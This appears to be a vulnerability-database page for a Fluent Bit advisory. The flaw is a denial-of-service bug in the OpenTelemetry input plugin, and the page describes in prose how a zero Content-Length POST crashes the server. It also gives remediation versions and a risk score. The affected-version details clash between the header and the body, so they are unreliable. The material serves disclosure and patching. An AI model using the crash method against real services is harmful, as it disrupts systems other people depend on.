Fluent Bit Prometheus Remote Write
Moderate fix1 remedy
cpe:2.3:a:treasuredata:fluent_bit:*:*:*:*:*:*:*
Moderate fix1 remedy
- >= 3.2, < 3.2.10
Fluent Bit OpenTelemetry Input Plugin Remote Denial-of-Service Vulnerability
Vulnerability
Patched
A remote denial-of-service vulnerability has been identified in Fluent Bit versions through 3.1.9. When the OpenTelemetry input plugin is active and listening on an IP address and port, sending a packet with a Content-Length of 0 causes the server to crash. This issue arises from improper handling of the Content-Length header, leading to a NULL pointer dereference. The vulnerability allows users with access to the endpoint to disrupt the service by causing a crash.
Impact
Exploitation of this vulnerability leads to a crash of the Fluent Bit process, causing a denial-of-service condition where the service becomes unresponsive or unavailable.
Reproduction
The vulnerability can be reproduced by sending an HTTP POST request to an OpenTelemetry input plugin endpoint with the Content-Length header set to 0. This can be done using tools like curl or Burp Suite.
Remediation
Users can upgrade to Fluent Bit versions 4.0.1 or 4.0.3, both of which include a patch for this vulnerability.
Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM
Vulnerability Rating
Custom Algorithm
spread
6.6impact
2.5exploitability
6.0remediation
7.7relevance
0.0threat
6.4urgency
2.9incentive
1.7Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.